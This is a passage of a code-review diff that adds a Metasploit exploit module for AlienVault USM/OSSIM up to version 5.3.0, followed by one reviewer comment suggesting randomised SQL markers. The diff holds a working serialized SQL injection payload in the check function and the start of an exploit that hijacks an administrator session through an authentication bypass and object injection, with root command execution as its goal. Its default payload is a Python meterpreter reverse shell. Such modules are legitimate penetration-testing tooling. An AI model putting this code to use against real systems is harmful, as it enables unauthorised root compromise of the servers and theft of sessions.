modules/exploits/linux/http/alienvault_exec.rb

```diff
@@ -0,0 +1,322 @@
+        Unauthenticated users can execute arbitrary commands under the context of the root user.
+
+        By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability
+        which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue
+        action and policy that enables to execute operating system commands by using captured session token. As a final step,
+        SSH login attempt with a invalid credentials can trigger a created rogue policy which triggers an action that executes
+        operating system command with root user privileges.
+
+        This module was tested against following product and versions:
+        AlienVault USM 5.3.0, 5.2.5, 5.0.0, 4.15.11, 4.5.0
+        AlienVault OSSIM 5.0.0, 4.6.1
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Peter Lapp', # EDB advisory owner
+          'Mehmet Ince <mehmet@mehmetince.net>' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/unexpected-journey-into-the-alienvault-ossimusm-during-engagement/'],
+          ['EDB', '40682']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL'      => true,
+          'WfsDelay' => 10,
+          'Payload'  => 'python/meterpreter/reverse_tcp'
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        =>
+        [
+          ['Alienvault USM/OSSIM <= 5.3.0', {}]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Jan 31 2017",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
+      ], self.class)
+  end
+
+
+  def check
+    r = rand_text_alpha(15)
+    p = "a:1:{s:4:\"type\";s:69:\"1 AND extractvalue(rand(),concat(0x3a,(SELECT '#{r}')))-- \";}"
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),
+      'headers' => {
+        'User-Agent' => 'AV Report Scheduler',
+      },
+      'vars_get' => {
+        'type' => 'alarm',
+        'wtype' => 'foo',
+        'asset' => 'ALL_ASSETS',
+        'height' => 1,
+        'value' => p
+      }
+    })
+
+    if res && res.code == 200 && res.body =~ /XPATH syntax error: ':#{r}'/
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+
+  end
+
+
+  def exploit
+    # Hijacking Administrator session by exploiting objection injection vuln that end up with sqli
+    print_status("Hijacking administrator session")
+
+    sql = "SELECT id FROM sessions LIMIT 1"
+    p = "a:1:{s:4:\"type\";s:#{(sql.length + 58).to_s}:\"1 AND extractvalue(rand(),concat(0x3a3a3a,(#{sql}),0x3a3a3a))-- \";}"
```

Comment:
Nothing crazy, but I usually try to randomize the 0x3a3a3a used as markers here in the concat call.